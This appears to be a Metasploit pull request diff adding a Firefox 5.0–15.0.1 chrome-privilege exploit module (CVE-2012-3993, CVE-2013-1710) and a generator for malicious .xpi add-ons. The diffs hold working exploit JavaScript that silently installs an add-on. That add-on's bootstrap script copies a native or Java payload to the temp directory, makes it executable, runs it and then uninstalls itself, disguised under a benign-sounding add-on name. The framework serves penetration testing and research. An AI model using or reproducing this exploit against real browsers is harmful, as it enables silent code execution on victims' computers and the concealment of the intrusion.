### PR TITLE
firefox 5.0 - 15.0.1 chrome privilege execution (CVE-2012-3993 and CVE-2013-1710)

### DIFF
--- a/lib/msf/core/exploit/mixins.rb
+++ b/lib/msf/core/exploit/mixins.rb
@@ -98,4 +98,7 @@ require 'msf/core/exploit/winrm'
 # WebApp
 require 'msf/core/exploit/web'
 
+# Firefox addons
+require 'msf/core/exploit/remote/firefox_addon_generator'
+
 require 'msf/core/exploit/remote/browser_exploit_server'

--- a/lib/msf/core/exploit/remote/browser_exploit_server.rb
+++ b/lib/msf/core/exploit/remote/browser_exploit_server.rb
@@ -93,6 +93,15 @@ module Msf
     end
 
     #
+    # Returns the absolute URL to the module's resource that points to on_request_exploit
+    #
+    # @return [String] absolute URI to the exploit page
+    #
+    def get_module_uri
+      "#{get_uri.chomp("/")}/#{@exploit_receiver_page}"
+    end
+
+    #
     # Returns the current target
     #
     def get_target
@@ -166,8 +175,10 @@ module Msf
         # Special keys to ignore because the script registers this as [:activex] = true or false
         next if k == :clsid or k == :method
 
-        if v.class == Regexp
+        if v.is_a? Regexp
           bad_reqs << k if profile[k.to_sym] !~ v
+        elsif v.is_a? Proc
+          bad_reqs << k unless v.call(profile[k.to_sym])
         else
           bad_reqs << k if profile[k.to_sym] != v
         end

--- a/lib/msf/core/exploit/remote/firefox_addon_generator.rb
+++ b/lib/msf/core/exploit/remote/firefox_addon_generator.rb
@@ -7,7 +7,6 @@
 #
 ###
 
-
 module Msf
 module Exploit::Remote::FirefoxAddonGenerator
 

--- a/lib/msf/core/exploit/remote/firefox_addon_generator.rb
+++ b/lib/msf/core/exploit/remote/firefox_addon_generator.rb
@@ -11,6 +11,48 @@
 module Msf
 module Exploit::Remote::FirefoxAddonGenerator
 
+  # Add in the supported datastore options
+  def initialize( info = {} )
+    super(update_info(info,
+      'Platform'      => %w{ java linux osx solaris win },
+      'Payload'       => { 'BadChars' => '', 'DisableNops' => true },
+      'Targets'       =>
+        [
+          [ 'Generic (Java Payload)',
+            {
+              'Platform' => ['java'],
+              'Arch' => ARCH_JAVA
+            }
+          ],
+          [ 'Windows x86 (Native Payload)',
+            {
+              'Platform' => 'win',
+              'Arch' => ARCH_X86,
+            }
+          ],
+          [ 'Linux x86 (Native Payload)',
+            {
+              'Platform' => 'linux',
+              'Arch' => ARCH_X86,
+            }
+          ],
+          [ 'Mac OS X PPC (Native Payload)',
+            {
+              'Platform' => 'osx',
+              'Arch' => ARCH_PPC,
+            }
+          ],
+          [ 'Mac OS X x86 (Native Payload)',
+            {
+              'Platform' => 'osx',
+              'Arch' => ARCH_X86,
+            }
+          ]
+        ],
+      'DefaultTarget'  => 1
+    ))
+  end
+
   # @return [Rex::Zip::Archive] containing a .xpi, ready to be served with the
   # 'application/x-xpinstall' MIME type
   def generate_addon_xpi

--- a/lib/msf/core/exploit/remote/firefox_addon_generator.rb
+++ b/lib/msf/core/exploit/remote/firefox_addon_generator.rb
@@ -1,0 +1,125 @@
+# -*- coding: binary -*-
+
+###
+#
+# The FirefoxAddonGenerator allows a firefox exploit module to serve a malicious .xpi
+# addon that will gain a session.
+#
+###
+
+
+module Msf
+module Exploit::Remote::FirefoxAddonGenerator
+
+  # @return [Rex::Zip::Archive] containing a .xpi, ready to be served with the
+  # 'application/x-xpinstall' MIME type
+  def generate_addon_xpi
+    # If we haven't returned yet, then this is a request for our xpi,
+    # so build one
+
+    if target.name == 'Generic (Java Payload)'
+      jar = p.encoded_jar
+      jar.build_manifest(:main_class => "metasploit.Payload")
+      payload_file = jar.pack
+      payload_name='payload.jar'
+      payload_script=%q|
+  var java = Components.classes["@mozilla.org/appshell/window-mediator;1"].getService(Components.interfaces.nsIWindowMediator).getMostRecentWindow('navigator:browser').Packages.java
+  java.lang.System.setSecurityManager(null);
+  var cl = new java.net.URLClassLoader([new java.io.File(tmp.path).toURI().toURL()]);
+  var m = cl.loadClass("metasploit.Payload").getMethod("main", [java.lang.Class.forName("[Ljava.lang.String;")]);
+  m.invoke(null, [java.lang.reflect.Array.newInstance(java.lang.Class.forName("java.lang.String"), 0)]);
+      |
+    else
+      payload_file = generate_payload_exe
+      payload_name = Rex::Text.rand_text_alphanumeric(8) + '.exe'
+      payload_script=%q|
+  var process=Components.classes["@mozilla.org/process/util;1"].createInstance(Components.interfaces.nsIProcess);
+  process.init(tmp);
+  process.run(false,[],0);
+      |
+      if target.name != 'Windows x86 (Native Payload)'
+        payload_script = %q|
+        var chmod=Components.classes["@mozilla.org/file/local;1"].createInstance(Components.interfaces.nsILocalFile);
+        chmod.initWithPath("/bin/chmod");
+        var process=Components.classes["@mozilla.org/process/util;1"].createInstance(Components.interfaces.nsIProcess);
+        process.init(chmod);
+        process.run(true, ["+x", tmp.path], 2);
+        | + payload_script
+      end
+    end
+
+    zip = Rex::Zip::Archive.new
+    xpi_guid = Rex::Text.rand_guid
+    bootstrap_script = %q|
+function startup(data, reason) {
+  var file = Components.classes["@mozilla.org/file/directory_service;1"].
+          getService(Components.interfaces.nsIProperties).
+          get("ProfD", Components.interfaces.nsIFile);
+  file.append("extensions");
+    |
+    bootstrap_script << %Q|xpi_guid="#{xpi_guid}";|
+    bootstrap_script << %Q|payload_name="#{payload_name}";|
+    bootstrap_script << %q|
+  file.append(xpi_guid);
+  file.append(payload_name);
+  var tmp = Components.classes["@mozilla.org/file/directory_service;1"].
+          getService(Components.interfaces.nsIProperties).
+          get("TmpD", Components.interfaces.nsIFile);
+  tmp.append(payload_name);
+  tmp.createUnique(Components.interfaces.nsIFile.NORMAL_FILE_TYPE, 0666);
+  file.copyTo(tmp.parent, tmp.leafName);
+    |
+    bootstrap_script << payload_script
+
+    if (datastore['AutoUninstall'])
+      bootstrap_script <<  %q|
+  try { // Fx < 4.0
+    Components.classes["@mozilla.org/extensions/manager;1"].getService(Components.interfaces.nsIExtensionManager).uninstallItem(xpi_guid);
+  } catch (e) {}
+  try { // Fx 4.0 and later
+    Components.utils.import("resource://gre/modules/AddonManager.jsm");
+    AddonManager.getAddonByID(xpi_guid, function(addon) {
+      addon.uninstall();
+    });
+  } catch (e) {}
+      |
+    end
+
+    bootstrap_script << "}"
+
+    zip.add_file('bootstrap.js', bootstrap_script)
+    zip.add_file(payload_name, payload_file)
+    zip.add_file('chrome.manifest', "content\t#{xpi_guid}\t./\noverlay\tchrome://browser/content/browser.xul\tchrome://#{xpi_guid}/content/overlay.xul\n")
+    zip.add_file('install.rdf', %Q|<?xml version="1.0"?>
+<RDF xmlns="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:em="http://www.mozilla.org/2004/em-rdf#">
+  <Description about="urn:mozilla:install-manifest">
+    <em:id>#{xpi_guid}</em:id>
+    <em:name>#{datastore['ADDONNAME']}</em:name>
+    <em:version>1.0</em:version>
+    <em:bootstrap>true</em:bootstrap>
+    <em:unpack>true</em:unpack>
+    <em:targetApplication>
+      <Description>
+        <em:id>toolkit@mozilla.org</em:id>
+        <em:minVersion>1.0</em:minVersion>
+        <em:maxVersion>*</em:maxVersion>
+      </Description>
+    </em:targetApplication>
+    <em:targetApplication>
+      <Description>
+        <em:id>{ec8030f7-c20a-464f-9b0e-13a3a9e97384}</em:id>
+        <em:minVersion>1.0</em:minVersion>
+        <em:maxVersion>*</em:maxVersion>
+      </Description>
+    </em:targetApplication>
+    </Description>
+</RDF>|)
+    zip.add_file('overlay.xul', %q|<?xml version="1.0"?>
+<overlay xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul">
+  <script src="bootstrap.js"/>
+  <script><![CDATA[window.addEventListener("load", function(e) { startup(); }, false);]]></script>
+</overlay>|)
+    zip
+  end
+end
+end

--- a/lib/msf/core/exploit/remote/firefox_addon_generator.rb
+++ b/lib/msf/core/exploit/remote/firefox_addon_generator.rb
@@ -66,9 +66,6 @@ module Exploit::Remote::FirefoxAddonGenerator
   # @return [Rex::Zip::Archive] containing a .xpi, ready to be served with the
   # 'application/x-xpinstall' MIME type
   def generate_addon_xpi
-    # If we haven't returned yet, then this is a request for our xpi,
-    # so build one
-
     if target.name == 'Generic (Java Payload)'
       jar = p.encoded_jar
       jar.build_manifest(:main_class => "metasploit.Payload")

--- a/lib/msf/core/exploit/remote/firefox_addon_generator.rb
+++ b/lib/msf/core/exploit/remote/firefox_addon_generator.rb
@@ -51,6 +51,17 @@ module Exploit::Remote::FirefoxAddonGenerator
         ],
       'DefaultTarget'  => 1
     ))
+
+    register_options( [
+      OptString.new('ADDONNAME', [ true,
+        "The addon name.",
+        "HTML5 Rendering Enhancements"
+        ]),
+      OptBool.new('AutoUninstall', [ true,
+        "Automatically uninstall the addon after payload execution",
+        true
+        ])
+    ], self.class)
   end
 
   # @return [Rex::Zip::Archive] containing a .xpi, ready to be served with the

--- a/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb
+++ b/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb
@@ -29,7 +29,11 @@ class Metasploit3 < Msf::Exploit::Remote
         API is invoked to silently install a malicious plugin.
       },
       'License' => MSF_LICENSE,
-      'Author'  => [ 'joev' ],
+      'Author'  => [
+        'Mariusz Mlynski', # discovered CVE-2012-3993
+        'moz_bug_r_a4', # discovered CVE-2013-1710
+        'joev' # metasploit module
+      ],
       'References' => [
         ['CVE', '2012-3993'],  # used to install function that gets called from chrome:// (ff<15)
         ['OSVDB', '86111'],
@@ -54,41 +58,52 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def generate_html
     %Q|
-<html>
-<body>
-#{datastore['CONTENT']} 
-<div id='payload' style='display:none'>
-window.AddonManager.getInstallForURL(
-  '#{get_uri}/addon.xpi',
-  function(install) { install.install() },
-  'application/x-xpinstall'
-);
-</div>
-<script>
-try{InstallTrigger.install(0)}catch(e){p=Object.getPrototypeOf(Object.getPrototypeOf(e));};
-p.__exposedProps__={
-  constructor:'rw',
-  prototype:'rw',
-  defineProperty:'rw',
-  __exposedProps__:'rw'
-};
-var s = document.querySelector('#payload').innerHTML;
-var q = false;
-var register = function(obj,key) {
-  var runme = function(){
-    if (q) return;
-    q = true;
-    window.crypto.generateCRMFRequest("CN=Me", "foo", "bar", null, s, 384, null, "rsa-ex");
-  };
-  try {
-    p.constructor.defineProperty(obj,key,{get:runme});
-  } catch (e) {}
-};
-for (var i in window) register(window, i);
-for (var i in document) register(document, i);
-</script>
-</body>
-</html>
+      <html>
+      <body>
+      #{datastore['CONTENT']} 
+      <div id='payload' style='display:none'>
+      if (!window.done){
+        window.AddonManager.getInstallForURL(
+          '#{get_uri}/addon.xpi',
+          function(install) { install.install() },
+          'application/x-xpinstall'
+        );
+        window.done = true;
+      }
+      </div>
+      <script>
+      try{InstallTrigger.install(0)}catch(e){p=e;};
+      var p2=Object.getPrototypeOf(Object.getPrototypeOf(p));
+      p2.__exposedProps__={
+        constructor:'rw',
+        prototype:'rw',
+        defineProperty:'rw',
+        __exposedProps__:'rw'
+      };
+      var s = document.querySelector('#payload').innerHTML;
+      var q = false;
+      var register = function(obj,key) {
+        var runme = function(){
+          if (q) return;
+          q = true;
+          window.crypto.generateCRMFRequest("CN=Me", "foo", "bar", null, s, 384, null, "rsa-ex");
+        };
+        ver = (navigator.userAgent.match(/firefox\\/([\\d]+)/i) \|\| [])[1];
+        if(ver&&ver>=15) {
+          try {
+            Function.prototype.call.call(p.__defineGetter__,obj,key,runme);
+          } catch (e) {}
+        } else {
+          try {
+            p2.constructor.defineProperty(obj,key,{get:runme});
+          } catch (e) {}
+        }
+      };
+      for (var i in window) register(window, i);
+      for (var i in document) register(document, i);
+      </script>
+      </body>
+      </html>
     |
   end
 end

--- a/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb
+++ b/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb
@@ -1,0 +1,127 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::HttpServer::HTML
+  include Msf::Exploit::EXE
+  include Msf::Exploit::Remote::FirefoxAddonGenerator
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Firefox < 15 exposedProps XCS Code Execution',
+      'Description'    => %q{
+        On versions of Firefox before 15.0, the InstallTrigger object, when given
+        invalid input, would throw an exception that did not have an __exposedProps__
+        property set. By re-setting the property on the exception's prototype,
+        the chrome-based defineProperty method is made available.
+
+        With the defineProperty method, an overriden callback can be defined
+        that gets called from chrome-privileged context. From here, another
+        vulnerability is used to "peek" into the context's private scope. Unfortunately
+        the "good" parts of Components.classes are not available (we don't have a
+        chrome:// URL), so instead the AddonManager API is invoked to silently install
+        a malicious plugin.
+
+        Note: this exploit requires the user move their mouse at least 1px inside of
+        the browser window.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'        => [ 'joev' ],
+      'Platform'      => %w{ java linux osx solaris win },
+      'Targets'       =>
+        [
+          [ 'Generic (Java Payload)',
+            {
+              'Platform' => ['java'],
+              'Arch' => ARCH_JAVA
+            }
+          ],
+          [ 'Windows x86 (Native Payload)',
+            {
+              'Platform' => 'win',
+              'Arch' => ARCH_X86,
+            }
+          ],
+          [ 'Linux x86 (Native Payload)',
+            {
+              'Platform' => 'linux',
+              'Arch' => ARCH_X86,
+            }
+          ],
+          [ 'Mac OS X PPC (Native Payload)',
+            {
+              'Platform' => 'osx',
+              'Arch' => ARCH_PPC,
+            }
+          ],
+          [ 'Mac OS X x86 (Native Payload)',
+            {
+              'Platform' => 'osx',
+              'Arch' => ARCH_X86,
+            }
+          ]
+        ],
+      'DefaultTarget'  => 1
+    ))
+
+    register_options(
+      [
+        OptString.new('CONTENT', [ false, "Content to display inside the HTML <body>.", '' ] )
+      ], Auxiliary::Timed)
+
+  end
+
+  def exploit
+    super
+  end
+
+  def on_request_uri(cli, request)
+    if request.uri.match(/\.xpi$/i)
+      send_response( cli, generate_addon_xpi.pack, { 'Content-Type' => 'application/x-xpinstall' } )
+    else
+      send_response_html(cli, generate_html)
+    end
+  end
+
+  def generate_html
+    %Q|
+<html>
+<body>
+#{datastore['CONTENT']}
+<div id='payload' style='display:none'>
+if (!window.AddonManager.found) {
+  window.AddonManager.getInstallForURL(
+    '#{get_uri}/addon.xpi',
+    function(install) { install.install() },
+    'application/x-xpinstall'
+  );
+}
+</div>
+<script>
+var s = document.querySelector('#payload').innerHTML;
+try{InstallTrigger.install(0)}catch(e){p=Object.getPrototypeOf(Object.getPrototypeOf(e));};
+p.__exposedProps__={
+  constructor:'rw',
+  prototype:'rw',
+  defineProperty:'rw',
+  __exposedProps__:'rw'
+};
+var register = function(obj,key) {
+p.constructor.defineProperty(obj,key,{value:function(){
+  window.crypto.generateCRMFRequest("CN=Me", "foo", "bar", null, s, 1024, null, "rsa-ex");
+}});
+};
+register(document, 'compareDocumentPosition');
+</script>
+<a href='#' title='heh' style='position:absolute;display:block;top:0;left:0;right:0;bottom:0;'>  </a>
+</body>
+</html>
+    |
+  end
+end

--- a/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb
+++ b/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb
@@ -6,7 +6,7 @@
 require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
-  Rank = NormalRanking
+  Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpServer::HTML
   include Msf::Exploit::EXE
@@ -14,35 +14,34 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'           => 'Firefox < 15 exposedProps XCS Code Execution',
+      'Name'           => 'Firefox 3.5 - 14.0.1 __exposedProps__ XCS Code Execution',
       'Description'    => %q{
-        On versions of Firefox before 15.0, the InstallTrigger object, when given
+        On versions of Firefox from 3.5 to 14.0.1, the InstallTrigger global, when given
         invalid input, would throw an exception that did not have an __exposedProps__
-        property set. By re-setting the property on the exception's prototype,
+        property set. By re-setting this property on the exception object's prototype,
         the chrome-based defineProperty method is made available.
 
-        With the defineProperty method, an overriden callback can be defined
-        that gets called from chrome-privileged context. From here, another
-        vulnerability is used to "peek" into the context's private scope. Unfortunately
-        the "good" parts of Components.classes are not available (we don't have a
-        chrome:// URL), so instead the AddonManager API is invoked to silently install
-        a malicious plugin.
-
-        Note: this exploit requires the user move their mouse at least 1px inside of
-        the browser window.
+        With the defineProperty method, functions belonging to window and document can be
+        overriden with a function that gets called from chrome-privileged context. From here,
+        another vulnerability in the crypto.generateCRMFRequest function is used to "peek"
+        into the context's private scope. Since the window does not have a chrome:// URL,
+        the insecure parts of Components.classes are not available, so instead the AddonManager
+        API is invoked to silently install a malicious plugin.
       },
       'License' => MSF_LICENSE,
-      'Author'  => [ 'joev' ]
+      'Author'  => [ 'joev' ],
+      'References' => [
+        ['CVE', '2012-3993'],  # used to install function that gets called from chrome:// (ff<15)
+        ['OSVDB', '86111'],
+        ['URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=768101'],
+        ['CVE', '2013-1710'],  # used to peek into privileged caller's closure (ff<23)
+        ['OSVDB', '96019']
+      ]
     ))
 
     register_options([
       OptString.new('CONTENT', [ false, "Content to display inside the HTML <body>.", '' ] )
     ], self.class)
-
-  end
-
-  def exploit
-    super
   end
 
   def on_request_uri(cli, request)
@@ -57,19 +56,15 @@ class Metasploit3 < Msf::Exploit::Remote
     %Q|
 <html>
 <body>
-#{datastore['CONTENT']}
+#{datastore['CONTENT']} 
 <div id='payload' style='display:none'>
-if (!window.AddonManager.found) {
-  window.AddonManager.getInstallForURL(
-    '#{get_uri}/addon.xpi',
-    function(install) { install.install() },
-    'application/x-xpinstall'
-  );
-  window.AddonManager.found = true;
-}
+window.AddonManager.getInstallForURL(
+  '#{get_uri}/addon.xpi',
+  function(install) { install.install() },
+  'application/x-xpinstall'
+);
 </div>
 <script>
-var s = document.querySelector('#payload').innerHTML;
 try{InstallTrigger.install(0)}catch(e){p=Object.getPrototypeOf(Object.getPrototypeOf(e));};
 p.__exposedProps__={
   constructor:'rw',
@@ -77,14 +72,21 @@ p.__exposedProps__={
   defineProperty:'rw',
   __exposedProps__:'rw'
 };
+var s = document.querySelector('#payload').innerHTML;
+var q = false;
 var register = function(obj,key) {
-p.constructor.defineProperty(obj,key,{value:function(){
-  window.crypto.generateCRMFRequest("CN=Me", "foo", "bar", null, s, 1024, null, "rsa-ex");
-}});
+  var runme = function(){
+    if (q) return;
+    q = true;
+    window.crypto.generateCRMFRequest("CN=Me", "foo", "bar", null, s, 1024, null, "rsa-ex");
+  };
+  try {
+    p.constructor.defineProperty(obj,key,{get:runme});
+  } catch (e) {}
 };
-register(document, 'compareDocumentPosition');
+for (var i in window) register(window, i);
+for (var i in document) register(document, i);
 </script>
-<a href='#' title='heh' style='position:absolute;display:block;top:0;left:0;right:0;bottom:0;'>  </a>
 </body>
 </html>
     |

--- a/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb
+++ b/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb
@@ -34,7 +34,7 @@ class Metasploit3 < Msf::Exploit::Remote
         'moz_bug_r_a4', # discovered CVE-2013-1710
         'joev' # metasploit module
       ],
-      'DisclosureDate' => "Dec 19 2013",
+      'DisclosureDate' => "Aug 6 2013",
       'References' => [
         ['CVE', '2012-3993'],  # used to install function that gets called from chrome:// (ff<15)
         ['OSVDB', '86111'],

--- a/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb
+++ b/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb
@@ -31,49 +31,13 @@ class Metasploit3 < Msf::Exploit::Remote
         Note: this exploit requires the user move their mouse at least 1px inside of
         the browser window.
       },
-      'License'        => MSF_LICENSE,
-      'Author'        => [ 'joev' ],
-      'Platform'      => %w{ java linux osx solaris win },
-      'Targets'       =>
-        [
-          [ 'Generic (Java Payload)',
-            {
-              'Platform' => ['java'],
-              'Arch' => ARCH_JAVA
-            }
-          ],
-          [ 'Windows x86 (Native Payload)',
-            {
-              'Platform' => 'win',
-              'Arch' => ARCH_X86,
-            }
-          ],
-          [ 'Linux x86 (Native Payload)',
-            {
-              'Platform' => 'linux',
-              'Arch' => ARCH_X86,
-            }
-          ],
-          [ 'Mac OS X PPC (Native Payload)',
-            {
-              'Platform' => 'osx',
-              'Arch' => ARCH_PPC,
-            }
-          ],
-          [ 'Mac OS X x86 (Native Payload)',
-            {
-              'Platform' => 'osx',
-              'Arch' => ARCH_X86,
-            }
-          ]
-        ],
-      'DefaultTarget'  => 1
+      'License' => MSF_LICENSE,
+      'Author'  => [ 'joev' ]
     ))
 
-    register_options(
-      [
-        OptString.new('CONTENT', [ false, "Content to display inside the HTML <body>.", '' ] )
-      ], Auxiliary::Timed)
+    register_options([
+      OptString.new('CONTENT', [ false, "Content to display inside the HTML <body>.", '' ] )
+    ], self.class)
 
   end
 
@@ -101,6 +65,7 @@ if (!window.AddonManager.found) {
     function(install) { install.install() },
     'application/x-xpinstall'
   );
+  window.AddonManager.found = true;
 }
 </div>
 <script>

--- a/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb
+++ b/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb
@@ -8,7 +8,7 @@ require 'msf/core'
 class Metasploit3 < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
-  include Msf::Exploit::Remote::HttpServer::HTML
+  include Msf::Exploit::Remote::BrowserExploitServer
   include Msf::Exploit::EXE
   include Msf::Exploit::Remote::FirefoxAddonGenerator
 
@@ -40,7 +40,12 @@ class Metasploit3 < Msf::Exploit::Remote
         ['URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=768101'],
         ['CVE', '2013-1710'],  # used to peek into privileged caller's closure (ff<23)
         ['OSVDB', '96019']
-      ]
+      ],
+      'BrowserRequirements' => {
+        :source  => 'script',
+        :ua_name => HttpClients::FF,
+        :ua_ver  => lambda { |ver| ver.to_i.between?(5, 15) }
+      }   
     ))
 
     register_options([
@@ -48,15 +53,23 @@ class Metasploit3 < Msf::Exploit::Remote
     ], self.class)
   end
 
-  def on_request_uri(cli, request)
+  def on_request_exploit(cli, request, target_info)
     if request.uri.match(/\.xpi$/i)
-      send_response( cli, generate_addon_xpi.pack, { 'Content-Type' => 'application/x-xpinstall' } )
+      print_status("Sending the malicious addon")
+      send_response(cli, generate_addon_xpi.pack, { 'Content-Type' => 'application/x-xpinstall' })
     else
-      send_response_html(cli, generate_html)
+      print_status("Sending HTML")
+      send_response_html(cli, generate_html(target_info))
     end
   end
 
-  def generate_html
+  def generate_html(target_info)
+    injection = if target_info[:ua_ver].to_i == 15
+      "Function.prototype.call.call(p.__defineGetter__,obj,key,runme);"
+    else
+      "p2.constructor.defineProperty(obj,key,{get:runme});"
+    end
+
     %Q|
       <html>
       <body>
@@ -64,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote
       <div id='payload' style='display:none'>
       if (!window.done){
         window.AddonManager.getInstallForURL(
-          '#{get_uri}/addon.xpi',
+          '#{get_module_uri}/addon.xpi',
           function(install) { install.install() },
           'application/x-xpinstall'
         );
@@ -88,16 +101,9 @@ class Metasploit3 < Msf::Exploit::Remote
           q = true;
           window.crypto.generateCRMFRequest("CN=Me", "foo", "bar", null, s, 384, null, "rsa-ex");
         };
-        ver = (navigator.userAgent.match(/firefox\\/([\\d]+)/i) \|\| [])[1];
-        if(ver&&ver>=15) {
-          try {
-            Function.prototype.call.call(p.__defineGetter__,obj,key,runme);
-          } catch (e) {}
-        } else {
-          try {
-            p2.constructor.defineProperty(obj,key,{get:runme});
-          } catch (e) {}
-        }
+        try {
+          #{injection}
+        } catch (e) {}
       };
       for (var i in window) register(window, i);
       for (var i in document) register(document, i);

--- a/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb
+++ b/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb
@@ -14,9 +14,9 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'           => 'Firefox 5.0 - 14.0.1 __exposedProps__ XCS Code Execution',
+      'Name'           => 'Firefox 5.0 - 15.0.1 __exposedProps__ XCS Code Execution',
       'Description'    => %q{
-        On versions of Firefox from 5.0 to 14.0.1, the InstallTrigger global, when given
+        On versions of Firefox from 5.0 to 15.0.1, the InstallTrigger global, when given
         invalid input, would throw an exception that did not have an __exposedProps__
         property set. By re-setting this property on the exception object's prototype,
         the chrome-based defineProperty method is made available.

--- a/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb
+++ b/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb
@@ -34,6 +34,7 @@ class Metasploit3 < Msf::Exploit::Remote
         'moz_bug_r_a4', # discovered CVE-2013-1710
         'joev' # metasploit module
       ],
+      'DisclosureDate' => "Dec 19 2013",
       'References' => [
         ['CVE', '2012-3993'],  # used to install function that gets called from chrome:// (ff<15)
         ['OSVDB', '86111'],
@@ -45,7 +46,7 @@ class Metasploit3 < Msf::Exploit::Remote
         :source  => 'script',
         :ua_name => HttpClients::FF,
         :ua_ver  => lambda { |ver| ver.to_i.between?(5, 15) }
-      }   
+      }
     ))
 
     register_options([
@@ -73,7 +74,7 @@ class Metasploit3 < Msf::Exploit::Remote
     %Q|
       <html>
       <body>
-      #{datastore['CONTENT']} 
+      #{datastore['CONTENT']}
       <div id='payload' style='display:none'>
       if (!window.done){
         window.AddonManager.getInstallForURL(

--- a/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb
+++ b/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb
@@ -14,9 +14,9 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'           => 'Firefox 3.5 - 14.0.1 __exposedProps__ XCS Code Execution',
+      'Name'           => 'Firefox 5.0 - 14.0.1 __exposedProps__ XCS Code Execution',
       'Description'    => %q{
-        On versions of Firefox from 3.5 to 14.0.1, the InstallTrigger global, when given
+        On versions of Firefox from 5.0 to 14.0.1, the InstallTrigger global, when given
         invalid input, would throw an exception that did not have an __exposedProps__
         property set. By re-setting this property on the exception object's prototype,
         the chrome-based defineProperty method is made available.

--- a/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb
+++ b/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb
@@ -78,7 +78,7 @@ var register = function(obj,key) {
   var runme = function(){
     if (q) return;
     q = true;
-    window.crypto.generateCRMFRequest("CN=Me", "foo", "bar", null, s, 1024, null, "rsa-ex");
+    window.crypto.generateCRMFRequest("CN=Me", "foo", "bar", null, s, 384, null, "rsa-ex");
   };
   try {
     p.constructor.defineProperty(obj,key,{get:runme});

--- a/modules/exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb
+++ b/modules/exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb
@@ -12,7 +12,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::HttpServer::HTML
   include Msf::Exploit::EXE
-  include Msf::Exploit::Remote::Browser::FirefoxAddonGenerator
+  include Msf::Exploit::Remote::FirefoxAddonGenerator
 
   def initialize( info = {} )
     super( update_info( info,
@@ -62,7 +62,6 @@ class Metasploit3 < Msf::Exploit::Remote
       send_not_found(cli)
       return
     end
-
 
     print_status("Sending xpi and waiting for user to click 'accept'...")
     send_response( cli, generate_addon_xpi.pack, { 'Content-Type' => 'application/x-xpinstall' } )

--- a/modules/exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb
+++ b/modules/exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb
@@ -54,6 +54,8 @@ class Metasploit3 < Msf::Exploit::Remote
       return
     end
 
+    # If we haven't returned yet, then this is a request for our xpi,
+    # so build one
     p = regenerate_payload(cli)
     if not p
       print_error("Failed to generate the payload.")

--- a/modules/exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb
+++ b/modules/exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb
@@ -37,55 +37,8 @@ class Metasploit3 < Msf::Exploit::Remote
           [ 'URL', 'https://developer.mozilla.org/en/Extensions/Bootstrapped_extensions' ],
           [ 'URL', 'http://dvlabs.tippingpoint.com/blog/2007/06/27/xpi-the-next-malware-vector' ]
         ],
-      'DisclosureDate' => 'Jun 27 2007',
-      'Platform'      => %w{ java linux osx solaris win },
-      'Payload'       => { 'BadChars' => '', 'DisableNops' => true },
-      'Targets'       =>
-        [
-          [ 'Generic (Java Payload)',
-            {
-              'Platform' => ['java'],
-              'Arch' => ARCH_JAVA
-            }
-          ],
-          [ 'Windows x86 (Native Payload)',
-            {
-              'Platform' => 'win',
-              'Arch' => ARCH_X86,
-            }
-          ],
-          [ 'Linux x86 (Native Payload)',
-            {
-              'Platform' => 'linux',
-              'Arch' => ARCH_X86,
-            }
-          ],
-          [ 'Mac OS X PPC (Native Payload)',
-            {
-              'Platform' => 'osx',
-              'Arch' => ARCH_PPC,
-            }
-          ],
-          [ 'Mac OS X x86 (Native Payload)',
-            {
-              'Platform' => 'osx',
-              'Arch' => ARCH_X86,
-            }
-          ]
-        ],
-      'DefaultTarget'  => 1
+      'DisclosureDate' => 'Jun 27 2007'
     ))
-
-    register_options( [
-      OptString.new('ADDONNAME', [ true,
-        "The addon name.",
-        "HTML5 Rendering Enhancements"
-        ]),
-      OptBool.new('AutoUninstall', [ true,
-        "Automatically uninstall the addon after payload execution",
-        true
-        ])
-    ], self.class)
   end
 
   def on_request_uri( cli, request )

--- a/modules/exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb
+++ b/modules/exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb
@@ -12,6 +12,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::HttpServer::HTML
   include Msf::Exploit::EXE
+  include Msf::Exploit::Remote::Browser::FirefoxAddonGenerator
 
